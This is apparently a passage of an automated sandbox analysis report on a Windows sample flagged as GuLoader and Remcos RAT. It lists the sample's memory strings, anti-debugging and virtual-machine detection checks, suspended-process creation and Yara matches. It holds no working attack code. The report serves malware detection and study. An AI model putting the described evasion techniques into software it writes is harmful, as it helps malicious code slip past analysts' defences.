Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWu
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWH0
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5781 rdtsc 1_2_020F5781
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F6568 LdrInitializeThunk, 1_2_020F6568
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F853B mov eax, dword ptr fs:[00000030h] 1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F73B4 mov eax, dword ptr fs:[00000030h] 1_2_020F73B4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F3441 mov eax, dword ptr fs:[00000030h] 1_2_020F3441
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F5589 mov eax, dword ptr fs:[00000030h] 1_2_020F5589
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F3874 mov eax, dword ptr fs:[00000030h] 1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F7898 mov eax, dword ptr fs:[00000030h] 1_2_020F7898
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Code function: 1_2_020F2D3B mov eax, dword ptr fs:[00000030h] 1_2_020F2D3B

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp Binary or memory string: Program Managerc
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp Binary or memory string: Program Manager
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp Binary or memory string: Progman
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp, logs.dat.11.dr Binary or memory string: [ Program Manager ]
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp Binary or memory string: Program ManagerAZALZ\z
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp Binary or memory string: Program ManagerAZALZ\q
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp Binary or memory string: |Program Manager|
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp Binary or memory string: Program ManagerAZALZ\,

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Remcos RAT
Source: Yara match File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR